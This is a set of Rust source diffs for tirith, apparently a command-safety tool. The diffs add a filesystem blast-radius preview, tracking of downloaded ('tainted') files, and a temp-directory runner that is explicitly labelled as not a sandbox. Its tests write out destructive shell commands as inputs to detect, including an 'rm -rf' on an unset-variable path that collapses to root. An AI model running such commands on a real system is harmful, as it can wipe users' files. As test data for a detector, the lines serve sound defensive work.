+/// findings (large file count, and an ABSENT-var `$VAR/` glob that tirith cannot
+/// confirm is unset in the shell — see F2) do not change the exit code.
 pub fn run(command: &str, json: bool) -> i32 {
     let command = command.trim();
     if command.is_empty() {
@@ -140,6 +141,15 @@ fn print_human(
             "  note: walk stopped at the depth-{}/{}-file cap; counts are lower bounds.",
             blast_radius::MAX_WALK_DEPTH,
             blast_radius::MAX_FILE_COUNT
+        );
+    }
+
+    if report.walk_errors > 0 {
+        println!();
+        println!(
+            "  note: {} path(s) could not be read (permission denied / I/O error); \
+             counts are LOWER BOUNDS — the real blast radius may be larger.",
+            report.walk_errors
         );
     }
 
@@ -249,14 +259,22 @@ mod tests {
     }
 
     #[test]
-    fn preview_empty_var_glob_blocks() {
-        // EMPTY var is unset → `rm -rf "$TIRITH_PREVIEW_UNSET/"` collapses to
-        // root → BlastEmptyVarGlob (High) → exit 1.
+    fn preview_empty_var_glob_absent_is_advisory() {
+        // F2: `$TIRITH_PREVIEW_UNSET` is ABSENT from tirith's process env. Tirith
+        // cannot tell whether it is a benign non-exported shell-local or a truly
+        // unset var that would collapse `rm -rf "$VAR/"` to root, so the
+        // BlastEmptyVarGlob finding fires at Info (advisory) — NOT a Block.
+        // (A PRESENT-and-empty var is unambiguously High; that case is
+        // unit-tested in blast_radius.rs without a process-env mutation.)
         let dir = tempfile::tempdir().unwrap();
         fs::create_dir_all(dir.path().join(".git")).unwrap();
         let _guard = CwdGuard::enter(dir.path());
         let code = run("rm -rf \"$TIRITH_PREVIEW_UNSET/\"", false);
-        assert_eq!(code, Action::Block.exit_code(), "empty-var glob must block");
+        assert_eq!(
+            code,
+            Action::Allow.exit_code(),
+            "an absent (possibly shell-local) empty-var glob is advisory, not a block"
+        );
     }
 
     #[test]

--- a/crates/tirith/src/cli/preview.rs
+++ b/crates/tirith/src/cli/preview.rs
@@ -1,0 +1,304 @@
+//! `tirith preview -- "<cmd>"` — blast-radius simulator.
+//!
+//! ## What this is
+//!
+//! `tirith preview` answers "if I run this destructive command right now, what
+//! would it touch?" for `rm` / `mv` / `chmod -R` / `find … -delete` /
+//! `rsync --delete`. It **walks the filesystem** (capped at depth 5 / 100k
+//! files), expands globs against the current directory, and reports the file /
+//! directory / symlink counts, the largest file, whether any target escapes the
+//! repository, and whether it writes a system path.
+//!
+//! ## What this is NOT
+//!
+//! - It does NOT execute the command. It only simulates the filesystem impact.
+//! - It is NOT a sandbox or a security boundary — it reads the disk to count
+//!   impact and then exits.
+//! - It is the ONLY surface that walks the filesystem. The `tirith check` hot
+//!   path NEVER walks the disk; it runs only the cheap string-shape blast-radius
+//!   subset (`blast_radius::cheap_check`). See the `engine::analyze`
+//!   doc-comment for the hot/cold split.
+//!
+//! Globs expand against the current working directory, so the reported counts
+//! reflect the cwd at the time `tirith preview` runs.
+
+use std::io::Write;
+use std::path::PathBuf;
+
+use tirith_core::blast_radius::{self, BlastReport};
+use tirith_core::tokenize::ShellType;
+use tirith_core::verdict::{action_from_findings, Action, Finding};
+
+/// Entry point. `command` is the destructive command to simulate (already
+/// joined from the trailing var-args). `json` selects machine output.
+///
+/// Exit codes follow the standard tirith convention derived from the merged
+/// findings: 0 on Allow (no findings), 1 on Block (a High-severity finding
+/// fired — e.g. system-path / outside-repo / empty-var glob), 2 on Warn
+/// (Medium — `find -delete` / `rsync --delete` / symlinks). Info findings
+/// (large file count) do not change the exit code.
+pub fn run(command: &str, json: bool) -> i32 {
+    let command = command.trim();
+    if command.is_empty() {
+        eprintln!("tirith preview: no command given (usage: tirith preview -- \"rm -rf ./dist\")");
+        return 2;
+    }
+
+    let cwd = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
+    let cwd_str = cwd.display().to_string();
+    let repo_root = tirith_core::policy::find_repo_root(Some(&cwd_str));
+
+    let env_map = blast_radius::env_snapshot();
+
+    // The full filesystem-walking simulation. This is the EXPENSIVE surface
+    // that ONLY `tirith preview` is allowed to run.
+    let report = blast_radius::simulate(
+        command,
+        ShellType::Posix,
+        &cwd,
+        repo_root.as_deref(),
+        &env_map,
+    );
+
+    // Merge the simulator-only findings with the cheap string-shape findings so
+    // the preview surfaces the full picture (e.g. a system-path target shows
+    // both BlastWritesSystemPath and any count signals).
+    let mut findings = blast_radius::report_findings(&report);
+    findings.extend(blast_radius::cheap_check(
+        command,
+        ShellType::Posix,
+        &env_map,
+    ));
+    dedup_findings(&mut findings);
+
+    let action = action_from_findings(&findings);
+
+    if json {
+        return emit_json(command, &report, repo_root.as_deref(), &findings, action);
+    }
+
+    print_human(command, &report, repo_root.is_some(), &findings, action);
+    action.exit_code()
+}
+
+fn print_human(
+    command: &str,
+    report: &BlastReport,
+    has_repo_root: bool,
+    findings: &[Finding],
+    action: Action,
+) {
+    let banner = match action {
+        Action::Allow => "tirith preview: no blast-radius concerns",
+        Action::Warn | Action::WarnAck => "tirith preview: review before running",
+        Action::Block => "tirith preview: HIGH-IMPACT — do not run without review",
+    };
+    println!("{banner}");
+    println!("  command: {command}");
+    println!();
+
+    // The core impact summary.
+    let suffix = if report.walk_truncated { "+" } else { "" };
+    println!("  files:    {}{suffix}", report.file_count);
+    println!("  dirs:     {}{suffix}", report.dir_count);
+    println!("  symlinks: {}", report.symlink_count);
+    if let Some((path, size)) = &report.largest_file {
+        println!("  largest:  {path} ({})", human_size(*size));
+    }
+    if report.glob_expansion_count > 0 {
+        println!(
+            "  glob expanded to: {} path(s)",
+            report.glob_expansion_count
+        );
+    }
+
+    // The two headline yes/no answers the acceptance criteria call out.
+    let outside = if report.unsafe_empty_var_glob {
+        "yes (empty-variable path collapses to root)"
+    } else if report.paths_outside_repo {
+        if has_repo_root {
+            "yes"
+        } else {
+            "yes (above current directory; no repo root found)"
+        }
+    } else {
+        "no"
+    };
+    println!("  outside repo: {outside}");
+    println!(
+        "  writes system path: {}",
+        if report.writes_system_path {
+            "yes"
+        } else {
+            "no"
+        }
+    );
+
+    if report.walk_truncated {
+        println!();
+        println!(
+            "  note: walk stopped at the depth-{}/{}-file cap; counts are lower bounds.",
+            blast_radius::MAX_WALK_DEPTH,
+            blast_radius::MAX_FILE_COUNT
+        );
+    }
+
+    if !findings.is_empty() {
+        println!();
+        for f in findings {
+            println!("  [{}] {} — {}", f.severity, f.rule_id, f.title);
+            println!("    {}", f.description);
+        }
+    }
+
+    println!();
+    println!("  note: this is a filesystem-impact preview only. tirith preview does NOT run the");
+    println!(
+        "        command and is NOT a sandbox — it reads the disk to count impact, then exits."
+    );
+}
+
+fn emit_json(
+    command: &str,
+    report: &BlastReport,
+    repo_root: Option<&std::path::Path>,
+    findings: &[Finding],
+    action: Action,
+) -> i32 {
+    #[derive(serde::Serialize)]
+    struct Out<'a> {
+        schema_version: u32,
+        command: &'a str,
+        repo_root: Option<String>,
+        action: Action,
+        report: &'a BlastReport,
+        findings: &'a [Finding],
+        /// Honesty-of-claim marker: this surface walks the filesystem but is
+        /// not a sandbox. Mirrors the M10 ch6 `isolation_kind` discipline.
+        analysis_kind: &'static str,
+    }
+    let out = Out {
+        schema_version: 1,
+        command,
+        repo_root: repo_root.map(|p| p.display().to_string()),
+        action,
+        report,
+        findings,
+        analysis_kind: "filesystem_impact_preview_not_a_sandbox",
+    };
+    let mut stdout = std::io::stdout().lock();
+    if serde_json::to_writer_pretty(&mut stdout, &out).is_err() || writeln!(stdout).is_err() {
+        eprintln!("tirith preview: failed to write JSON output");
+        return 1;
+    }
+    action.exit_code()
+}
+
+/// Drop duplicate `(rule_id)` findings in place, keeping the first occurrence.
+fn dedup_findings(findings: &mut Vec<Finding>) {
+    let mut seen = std::collections::HashSet::new();
+    findings.retain(|f| seen.insert(f.rule_id));
+}
+
+/// Human-friendly byte size (e.g. `1.2 MiB`).
+fn human_size(bytes: u64) -> String {
+    const UNITS: &[&str] = &["B", "KiB", "MiB", "GiB", "TiB"];
+    let mut size = bytes as f64;
+    let mut unit = 0;
+    while size >= 1024.0 && unit < UNITS.len() - 1 {
+        size /= 1024.0;
+        unit += 1;
+    }
+    if unit == 0 {
+        format!("{bytes} B")
+    } else {
+        format!("{size:.1} {}", UNITS[unit])
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::fs;
+
+    #[test]
+    fn empty_command_exits_two() {
+        assert_eq!(run("   ", false), 2);
+    }
+
+    #[test]
+    fn human_size_formats() {
+        assert_eq!(human_size(512), "512 B");
+        assert_eq!(human_size(1024), "1.0 KiB");
+        assert_eq!(human_size(1536), "1.5 KiB");
+    }
+
+    #[test]
+    fn preview_relative_dist_is_clean_exit() {
+        // Build a temp repo with a ./dist tree, cd into it, and confirm a
+        // repo-relative delete reports clean (exit 0).
+        let dir = tempfile::tempdir().unwrap();
+        fs::create_dir_all(dir.path().join(".git")).unwrap();
+        let dist = dir.path().join("dist");
+        fs::create_dir_all(&dist).unwrap();
+        fs::write(dist.join("a.js"), b"x").unwrap();
+
+        let _guard = crate::cli::preview::tests::CwdGuard::enter(dir.path());
+        let code = run("rm -rf ./dist", false);
+        assert_eq!(code, 0, "repo-relative delete should be clean");
+    }
+
+    #[test]
+    fn preview_empty_var_glob_blocks() {
+        // EMPTY var is unset → `rm -rf "$TIRITH_PREVIEW_UNSET/"` collapses to
+        // root → BlastEmptyVarGlob (High) → exit 1.
+        let dir = tempfile::tempdir().unwrap();
+        fs::create_dir_all(dir.path().join(".git")).unwrap();
+        let _guard = CwdGuard::enter(dir.path());
+        let code = run("rm -rf \"$TIRITH_PREVIEW_UNSET/\"", false);
+        assert_eq!(code, Action::Block.exit_code(), "empty-var glob must block");
+    }
+
+    #[test]
+    fn preview_find_delete_warns() {
+        let dir = tempfile::tempdir().unwrap();
+        fs::create_dir_all(dir.path().join(".git")).unwrap();
+        fs::write(dir.path().join("f.txt"), b"x").unwrap();
+        let _guard = CwdGuard::enter(dir.path());
+        let code = run("find . -type f -delete", false);
+        assert_eq!(
+            code,
+            Action::Warn.exit_code(),
+            "find -delete is Medium → warn"
+        );
+    }
+
+    /// RAII current-dir guard. `tirith preview` resolves globs / repo root from
+    /// the process cwd, so these tests must chdir. The crate-wide env lock keeps
+    /// concurrent cwd-mutating tests from racing.
+    pub(crate) struct CwdGuard {
+        prev: PathBuf,
+        _lock: std::sync::MutexGuard<'static, ()>,
+    }
+
+    impl CwdGuard {
+        pub(crate) fn enter(to: &std::path::Path) -> Self {
+            // A process-global lock so cwd-mutating tests in this module never
+            // run concurrently (cwd is process-global, like std::env).
+            static CWD_LOCK: std::sync::Mutex<()> = std::sync::Mutex::new(());
+            let lock = CWD_LOCK.lock().unwrap_or_else(|e| e.into_inner());
+            let prev = std::env::current_dir().unwrap();
+            // Canonicalize so macOS `/var` → `/private/var` symlink does not
+            // make the repo-root `starts_with` check fail.
+            let to = to.canonicalize().unwrap_or_else(|_| to.to_path_buf());
+            std::env::set_current_dir(&to).unwrap();
+            CwdGuard { prev, _lock: lock }
+        }
+    }
+
+    impl Drop for CwdGuard {
+        fn drop(&mut self) {
+            let _ = std::env::set_current_dir(&self.prev);
+        }
+    }
+}

--- a/crates/tirith/src/cli/taint.rs
+++ b/crates/tirith/src/cli/taint.rs
@@ -1,0 +1,176 @@
+//! `tirith taint list|explain|clear` (M10 ch3).
+//!
+//! Thin presenter over [`tirith_core::taint`]. The store (a JSONL file at
+//! `state_dir()/taint.jsonl`) and all read/write/normalize logic live in the
+//! library; this module is output + the `clear` confirmation prompt.
+//!
+//! A file becomes tainted via `tirith fetch --save <path> <url>` (a download
+//! kept at a known path). A later `bash <path>` then fires
+//! `ExecOfTaintedFile` from the engine. These subcommands inspect and manage
+//! the store:
+//!
+//! * `list` — every recorded taint (path, origin, when, source URL/repo).
+//! * `explain <file>` — the recorded mark for one file, or a clear "not
+//!   tainted" message.
+//! * `clear <file>` — remove the mark for one file (prompts for confirmation
+//!   unless `--yes`, or non-interactive without `--yes` refuses).
+
+use std::path::Path;
+
+use tirith_core::taint::{self, TaintEntry};
+
+use super::{confirm, write_json_stdout};
+
+/// `tirith taint list` — print every recorded taint.
+pub fn list(json: bool) -> i32 {
+    let entries = taint::list_taints();
+
+    if json {
+        if !write_json_stdout(&entries, "tirith taint list: failed to write JSON output") {
+            return 2;
+        }
+        return 0;
+    }
+
+    if entries.is_empty() {
+        println!("No tainted files recorded.");
+        println!();
+        println!("A file becomes tainted when you download-and-keep it, e.g.:");
+        println!("  tirith fetch --save ./install.sh https://untrusted.example/install.sh");
+        return 0;
+    }
+
+    println!("Tainted files ({}):", entries.len());
+    println!();
+    for entry in &entries {
+        print_entry_human(entry);
+        println!();
+    }
+    println!("Run `tirith taint clear <file>` to remove a mark once you trust the file.");
+    0
+}
+
+/// `tirith taint explain <file>` — print the recorded mark for one file.
+pub fn explain(file: &str, json: bool) -> i32 {
+    let entry = taint::is_tainted(Path::new(file), None);
+
+    if json {
+        #[derive(serde::Serialize)]
+        struct ExplainOut<'a> {
+            file: &'a str,
+            tainted: bool,
+            #[serde(skip_serializing_if = "Option::is_none")]
+            entry: Option<&'a TaintEntry>,
+        }
+        let out = ExplainOut {
+            file,
+            tainted: entry.is_some(),
+            entry: entry.as_ref(),
+        };
+        if !write_json_stdout(&out, "tirith taint explain: failed to write JSON output") {
+            return 2;
+        }
+        // Exit 1 when the file IS tainted, mirroring the engine's "block"
+        // posture for an exec of a tainted file; 0 when clean.
+        return if entry.is_some() { 1 } else { 0 };
+    }
+
+    match entry {
+        Some(e) => {
+            println!("{file}: TAINTED");
+            println!();
+            print_entry_human(&e);
+            println!();
+            println!("This file was downloaded from a risky source. Review it before running it.");
+            println!("Once you trust it: tirith taint clear {file}");
+            1
+        }
+        None => {
+            println!("{file}: not tainted");
+            0
+        }
+    }
+}
+
+/// `tirith taint clear <file>` — remove the mark for one file. Prompts for
+/// confirmation unless `--yes`. Non-interactive without `--yes` refuses.
+pub fn clear(file: &str, yes: bool, json: bool) -> i32 {
+    // Show what we are about to clear so the confirmation is informed.
+    let existing = taint::is_tainted(Path::new(file), None);
+    if existing.is_none() {
+        if json {
+            #[derive(serde::Serialize)]
+            struct ClearOut<'a> {
+                file: &'a str,
+                cleared: bool,
+                removed: usize,
+            }
+            let out = ClearOut {
+                file,
+                cleared: false,
+                removed: 0,
+            };
+            if !write_json_stdout(&out, "tirith taint clear: failed to write JSON output") {
+                return 2;
+            }
+        } else {
+            println!("{file}: not tainted — nothing to clear.");
+        }
+        return 0;
+    }
+
+    if !json && !confirm(&format!("Clear taint mark for {file}?"), yes) {
+        println!("Aborted — taint mark left in place.");
+        return 0;
+    }
+    // In JSON mode, require `--yes` to proceed non-interactively (no prompt on a
+    // machine-readable surface). Without it, refuse rather than silently clear.
+    if json && !yes {
+        eprintln!("tirith taint clear: --yes required in JSON mode to confirm removal");
+        return 2;
+    }
+
+    match taint::clear_taint(Path::new(file), None) {
+        Ok(removed) => {
+            if json {
+                #[derive(serde::Serialize)]
+                struct ClearOut<'a> {
+                    file: &'a str,
+                    cleared: bool,
+                    removed: usize,
+                }
+                let out = ClearOut {
+                    file,
+                    cleared: removed > 0,
+                    removed,
+                };
+                if !write_json_stdout(&out, "tirith taint clear: failed to write JSON output") {
+                    return 2;
+                }
+            } else {
+                println!(
+                    "Cleared taint mark for {file} ({removed} entr{}).",
+                    if removed == 1 { "y" } else { "ies" }
+                );
+            }
+            0
+        }
+        Err(e) => {
+            eprintln!("tirith taint clear: {e}");
+            2
+        }
+    }
+}
+
+/// Render one taint entry as indented human output.
+fn print_entry_human(entry: &TaintEntry) {
+    println!("  {}", entry.path);
+    println!("    origin:    {}", entry.origin);
+    println!("    marked_at: {}", entry.marked_at);
+    if let Some(ref url) = entry.source_url {
+        println!("    source_url:  {url}");
+    }
+    if let Some(ref repo) = entry.source_repo {
+        println!("    source_repo: {repo}");
+    }
+}

--- a/crates/tirith/src/cli/temp_run.rs
+++ b/crates/tirith/src/cli/temp_run.rs
@@ -41,7 +41,25 @@ filesystem-impact preview ONLY.";
 
 /// Stable machine-readable marker carried by every JSON envelope so a
 /// downstream consumer can never mistake `temp-run` for a security boundary.
+/// This is the string form of [`IsolationKind::FileOnlyNotASandbox`]; the
+/// `isolation_kind_const_matches_enum` test pins them together so the honesty
+/// contract has a single source of truth. Kept as a `pub` string for external
+/// consumers and the threat-model wording even though JSON is now emitted
+/// through the typed enum.
+#[allow(dead_code)]
 pub const ISOLATION_KIND: &str = "file_only_not_a_sandbox";
+
+/// The honesty-of-claim contract for `temp-run`, as a TYPE rather than a bare
+/// string literal (type-design #1). Serializing through this enum means a future
+/// edit cannot silently change or drop the `isolation_kind` marker — the only
+/// representable value is the not-a-sandbox one, and the serde rename pins the
+/// wire string. `temp-run`'s dominant requirement is that no consumer mistakes
+/// it for a sandbox, so the contract is worth encoding in the type system.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, serde::Serialize)]
+pub enum IsolationKind {
+    #[serde(rename = "file_only_not_a_sandbox")]
+    FileOnlyNotASandbox,
+}
 
 /// Environment variables preserved under `--strip-env`. Deliberately tiny:
 /// enough for most commands to find a home, a PATH, and render text, but not
@@ -233,8 +251,9 @@ fn emit_json(
 ) {
     let json_val = serde_json::json!({
         // The load-bearing honesty field: a consumer reading this can never
-        // mistake temp-run for a security boundary.
-        "isolation_kind": ISOLATION_KIND,
+        // mistake temp-run for a security boundary. Emitted through the typed
+        // `IsolationKind` enum so the contract cannot drift (type-design #1).
+        "isolation_kind": IsolationKind::FileOnlyNotASandbox,
         "not_a_sandbox": true,
         "disclaimer": NOT_A_SANDBOX_BANNER,
         "command": command_str,
@@ -414,6 +433,15 @@ mod tests {
         assert!(NOT_A_SANDBOX_BANNER.contains("full user privileges"));
         assert!(NOT_A_SANDBOX_BANNER.contains("keychain"));
         assert_eq!(ISOLATION_KIND, "file_only_not_a_sandbox");
+    }
+
+    #[test]
+    fn isolation_kind_const_matches_enum() {
+        // The typed enum and the string const must serialize to the SAME wire
+        // value so the honesty contract has one source of truth (type-design #1).
+        let serialized =
+            serde_json::to_value(IsolationKind::FileOnlyNotASandbox).expect("serialize enum");
+        assert_eq!(serialized, serde_json::Value::String(ISOLATION_KIND.into()));
     }
 
     #[test]

--- a/crates/tirith/src/cli/temp_run.rs
+++ b/crates/tirith/src/cli/temp_run.rs
@@ -1,0 +1,454 @@
+//! `tirith temp-run` — run a command in a throwaway temp directory and diff
+//! its filesystem impact (M10 ch6, design-decision D1).
+//!
+//! HONESTY-OF-CLAIM (the dominant requirement for this command):
+//! `temp-run` is **file isolation only — NOT a sandbox and NOT a security
+//! boundary**. The command runs with the user's FULL privileges. It can read
+//! the keychain, ssh keys, AWS / cloud credentials, and reach the network
+//! exactly as if you had run it directly. The ONLY thing `temp-run` changes is
+//! the *working directory*: the command starts in a fresh `mkdtemp` dir (empty
+//! by default, or a `.git`-stripped copy of the repo with `--copy-repo`) so
+//! files it WRITES land there instead of polluting your tree, and you get a
+//! diff of what it touched. Use it for filesystem-impact PREVIEW only.
+//!
+//! Runtime sandboxing is an explicit tirith non-goal (see
+//! `docs/threat-model.md`). This command does not contradict that non-goal — it
+//! is a file-isolation workflow, not a containment boundary.
+//!
+//! Portability notes (why this is pure Rust, no shell-out):
+//!   * `--copy-repo` walks the tree with `walkdir` + `fs::copy`, filtering any
+//!     path with a `.git/` component. We do NOT use `cp -R --exclude=.git`:
+//!     `--exclude` is a GNU coreutils extension and is absent on BSD/macOS `cp`.
+//!   * `--strip-env` uses `Command::env_clear()` then re-adds an explicit
+//!     allowlist (HOME, PATH, USER, LANG, TERM). We do NOT use `env -i HOME
+//!     PATH …`: the bare-name passthrough form of `env -i` is inconsistent
+//!     across coreutils and BSD `env` (BSD treats the names as commands).
+
+use std::collections::BTreeMap;
+use std::path::{Path, PathBuf};
+use std::process::Command;
+use std::time::SystemTime;
+
+use crate::cli::{confirm, write_json_stdout};
+
+/// The single honesty banner reused across help text and every human output
+/// surface. Pinned by `help_snapshots.rs::help_temp_run` and the
+/// `docs/threat-model.md` wording so the three never drift apart.
+pub const NOT_A_SANDBOX_BANNER: &str = "\
+file isolation only; not a sandbox. The command runs with full user privileges \
+and can read your keychain, ssh keys, AWS creds, and the network. Use this for \
+filesystem-impact preview ONLY.";
+
+/// Stable machine-readable marker carried by every JSON envelope so a
+/// downstream consumer can never mistake `temp-run` for a security boundary.
+pub const ISOLATION_KIND: &str = "file_only_not_a_sandbox";
+
+/// Environment variables preserved under `--strip-env`. Deliberately tiny:
+/// enough for most commands to find a home, a PATH, and render text, but not
+/// the broad surface (tokens, cloud creds) a real run would inherit. This is a
+/// convenience knob, NOT a secret-scrubbing security control.
+const STRIP_ENV_ALLOWLIST: [&str; 5] = ["HOME", "PATH", "USER", "LANG", "TERM"];
+
+/// Cap on files copied / inventoried so a giant tree can't hang the command.
+const MAX_FILES: usize = 100_000;
+
+/// `tirith temp-run -- <cmd>` — mkdtemp, optionally seed it, run the command
+/// there with the user's full privileges, diff the temp dir, then prompt to
+/// delete or keep it.
+///
+/// This is NOT a sandbox (see the module docs and [`NOT_A_SANDBOX_BANNER`]).
+/// The exit code is the CHILD command's exit code, except a usage error (2) or
+/// a setup/spawn failure (2). The filesystem diff is reported but never
+/// overrides the child's exit code.
+pub fn run(command: &[String], copy_repo: bool, strip_env: bool, json: bool) -> i32 {
+    let command_str = command.join(" ");
+    if command_str.trim().is_empty() {
+        eprintln!(
+            "tirith temp-run: no command given \
+             (usage: tirith temp-run -- ./script.sh)"
+        );
+        return 2;
+    }
+
+    // mkdtemp. The TempDir handle stays alive for the whole function so its
+    // Drop never fires mid-run or mid-diff (cleanup-race guard). We only delete
+    // at the very end, and only on explicit confirmation.
+    let temp = match tempfile::Builder::new()
+        .prefix("tirith-temp-run-")
+        .tempdir()
+    {
+        Ok(t) => t,
+        Err(e) => {
+            eprintln!("tirith temp-run: failed to create temp directory: {e}");
+            return 2;
+        }
+    };
+    let temp_path = temp.path().to_path_buf();
+
+    let cwd = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
+
+    // Optionally seed the temp dir with a .git-stripped copy of the repo.
+    let copied = if copy_repo {
+        match copy_repo_into(&cwd, &temp_path) {
+            Ok(n) => Some(n),
+            Err(e) => {
+                eprintln!("tirith temp-run: failed to copy repo: {e}");
+                return 2;
+            }
+        }
+    } else {
+        None
+    };
+
+    if !json {
+        print_preamble(&command_str, &temp_path, copy_repo, strip_env, copied);
+    }
+
+    // Baseline inventory AFTER seeding — so `--copy-repo` files aren't reported
+    // as "new". An empty temp dir yields an empty baseline.
+    let before = inventory(&temp_path);
+
+    // Run the command IN the temp dir, with the user's full privileges. The
+    // working directory is the only thing we constrain.
+    let exit_code = match run_in_dir(&command_str, &temp_path, strip_env) {
+        Ok(code) => code,
+        Err(e) => {
+            eprintln!("tirith temp-run: failed to run command: {e}");
+            return 2;
+        }
+    };
+
+    let after = inventory(&temp_path);
+    let (new_files, modified_files) = diff_inventories(&before, &after, &temp_path);
+
+    // Decide keep-vs-delete BEFORE moving the TempDir handle. Non-interactive
+    // (or an explicit "no") keeps the dir and prints its path; interactive "yes"
+    // deletes it. We never delete out from under the diff above.
+    let delete = confirm(
+        &format!("tirith temp-run: delete temp dir {}?", temp_path.display()),
+        false,
+    );
+
+    let kept_path = if delete {
+        // Dropping the handle removes the directory.
+        drop(temp);
+        None
+    } else {
+        // Persist the directory past Drop and surface the path for review.
+        let persisted = temp.keep();
+        Some(persisted)
+    };
+
+    if json {
+        emit_json(
+            &command_str,
+            exit_code,
+            copy_repo,
+            strip_env,
+            copied,
+            &new_files,
+            &modified_files,
+            kept_path.as_deref(),
+        );
+    } else {
+        print_result(exit_code, &new_files, &modified_files, kept_path.as_deref());
+    }
+
+    exit_code
+}
+
+/// Print the up-front honesty banner and run plan (human mode).
+fn print_preamble(
+    command_str: &str,
+    temp_path: &Path,
+    copy_repo: bool,
+    strip_env: bool,
+    copied: Option<usize>,
+) {
+    let s = tirith_core::style::Stream::Stdout;
+    println!(
+        "{} {}",
+        tirith_core::style::bold("temp-run:", s),
+        command_str
+    );
+    // The honesty banner, loud and unmissable, on every invocation.
+    println!("  {}", tirith_core::style::red(NOT_A_SANDBOX_BANNER, s));
+    println!("  temp dir: {}", temp_path.display());
+    if copy_repo {
+        match copied {
+            Some(n) => println!("  seeded:   copied {n} file(s) from the repo (.git excluded)"),
+            None => println!("  seeded:   repo copy"),
+        }
+    } else {
+        println!("  seeded:   empty (pass --copy-repo to copy the repo, .git excluded)");
+    }
+    if strip_env {
+        println!(
+            "  env:      stripped to allowlist [{}] (convenience, NOT secret scrubbing)",
+            STRIP_ENV_ALLOWLIST.join(", ")
+        );
+    } else {
+        println!("  env:      inherited in full (pass --strip-env to trim to an allowlist)");
+    }
+    println!();
+}
+
+/// Print the post-run filesystem diff and the keep/delete outcome (human mode).
+fn print_result(
+    exit_code: i32,
+    new_files: &[String],
+    modified_files: &[String],
+    kept_path: Option<&Path>,
+) {
+    println!("  exit code: {exit_code}");
+    print_list_section("new files", new_files);
+    print_list_section("modified files", modified_files);
+    match kept_path {
+        Some(p) => println!("\n  kept temp dir: {}", p.display()),
+        None => println!("\n  temp dir deleted"),
+    }
+}
+
+fn print_list_section(label: &str, items: &[String]) {
+    if items.is_empty() {
+        println!("\n  {label}: none");
+    } else {
+        println!("\n  {label} ({}):", items.len());
+        for i in items {
+            println!("    {i}");
+        }
+    }
+}
+
+#[allow(clippy::too_many_arguments)]
+fn emit_json(
+    command_str: &str,
+    exit_code: i32,
+    copy_repo: bool,
+    strip_env: bool,
+    copied: Option<usize>,
+    new_files: &[String],
+    modified_files: &[String],
+    kept_path: Option<&Path>,
+) {
+    let json_val = serde_json::json!({
+        // The load-bearing honesty field: a consumer reading this can never
+        // mistake temp-run for a security boundary.
+        "isolation_kind": ISOLATION_KIND,
+        "not_a_sandbox": true,
+        "disclaimer": NOT_A_SANDBOX_BANNER,
+        "command": command_str,
+        "exit_code": exit_code,
+        "copy_repo": copy_repo,
+        "files_copied": copied,
+        "strip_env": strip_env,
+        "env_allowlist": if strip_env { STRIP_ENV_ALLOWLIST.to_vec() } else { Vec::new() },
+        "new_files": new_files,
+        "modified_files": modified_files,
+        "temp_dir_kept": kept_path.is_some(),
+        "temp_dir": kept_path.map(|p| p.display().to_string()),
+    });
+    write_json_stdout(&json_val, "tirith temp-run: failed to write JSON output");
+}
+
+/// Run `command_str` through the platform shell with its working directory set
+/// to `dir`. With `strip_env`, the child's environment is cleared and rebuilt
+/// from the explicit allowlist. Returns the child's exit code (128 if killed by
+/// a signal with no code). The command runs with the user's full privileges —
+/// this is NOT isolation.
+fn run_in_dir(command_str: &str, dir: &Path, strip_env: bool) -> std::io::Result<i32> {
+    let mut cmd = if cfg!(windows) {
+        let mut c = Command::new("cmd");
+        c.arg("/C").arg(command_str);
+        c
+    } else {
+        let shell = std::env::var("SHELL").unwrap_or_else(|_| "/bin/sh".to_string());
+        let mut c = Command::new(shell);
+        c.arg("-c").arg(command_str);
+        c
+    };
+    cmd.current_dir(dir);
+
+    if strip_env {
+        // Portable env trimming: clear everything, then re-add only the
+        // allowlist values that are actually set in the current environment.
+        // (NOT `env -i NAME …` — the bare-name form is non-portable.)
+        cmd.env_clear();
+        for key in STRIP_ENV_ALLOWLIST {
+            if let Some(val) = std::env::var_os(key) {
+                cmd.env(key, val);
+            }
+        }
+    }
+
+    let status = cmd.status()?;
+    Ok(status.code().unwrap_or(128))
+}
+
+/// Copy the repo rooted at `src` into `dst`, excluding any path with a `.git`
+/// component. Pure `walkdir` + `fs::copy` — portable, no `cp --exclude`.
+/// Returns the number of regular files copied. Symlinks are skipped (we copy
+/// file contents only; a copied tree is for impact preview, not a faithful
+/// mirror).
+fn copy_repo_into(src: &Path, dst: &Path) -> std::io::Result<usize> {
+    use walkdir::WalkDir;
+
+    let mut copied = 0usize;
+    for entry in WalkDir::new(src)
+        .follow_links(false)
+        .into_iter()
+        // Prune `.git` directories wholesale so we never descend into them.
+        .filter_entry(|e| !(e.file_type().is_dir() && e.file_name().to_str() == Some(".git")))
+    {
+        if copied >= MAX_FILES {
+            break;
+        }
+        let entry = match entry {
+            Ok(e) => e,
+            Err(_) => continue,
+        };
+        let path = entry.path();
+        // Belt-and-suspenders: skip anything that still has a `.git` component
+        // (e.g. a nested submodule `.git` file) that slipped past the prune.
+        if path
+            .components()
+            .any(|c| c.as_os_str().to_str() == Some(".git"))
+        {
+            continue;
+        }
+        let rel = match path.strip_prefix(src) {
+            Ok(r) => r,
+            Err(_) => continue,
+        };
+        if rel.as_os_str().is_empty() {
+            continue; // the root itself
+        }
+        let target = dst.join(rel);
+        let ft = entry.file_type();
+        if ft.is_dir() {
+            std::fs::create_dir_all(&target)?;
+        } else if ft.is_file() {
+            if let Some(parent) = target.parent() {
+                std::fs::create_dir_all(parent)?;
+            }
+            std::fs::copy(path, &target)?;
+            copied += 1;
+        }
+        // Symlinks and other special files are intentionally skipped.
+    }
+    Ok(copied)
+}
+
+/// Inventory regular files under `root` as a `path -> mtime` map, capped at
+/// [`MAX_FILES`]. Symlinks are recorded by their own metadata (not followed).
+fn inventory(root: &Path) -> BTreeMap<String, SystemTime> {
+    use walkdir::WalkDir;
+
+    let mut out = BTreeMap::new();
+    for entry in WalkDir::new(root).follow_links(false) {
+        if out.len() >= MAX_FILES {
+            break;
+        }
+        let entry = match entry {
+            Ok(e) => e,
+            Err(_) => continue,
+        };
+        let meta = match entry.metadata() {
+            Ok(m) => m,
+            Err(_) => continue,
+        };
+        // Record files and symlinks (anything that isn't a directory) so a
+        // newly-created symlink shows up in the diff.
+        if !meta.is_dir() {
+            if let Ok(mtime) = meta.modified() {
+                out.insert(entry.path().to_string_lossy().into_owned(), mtime);
+            }
+        }
+    }
+    out
+}
+
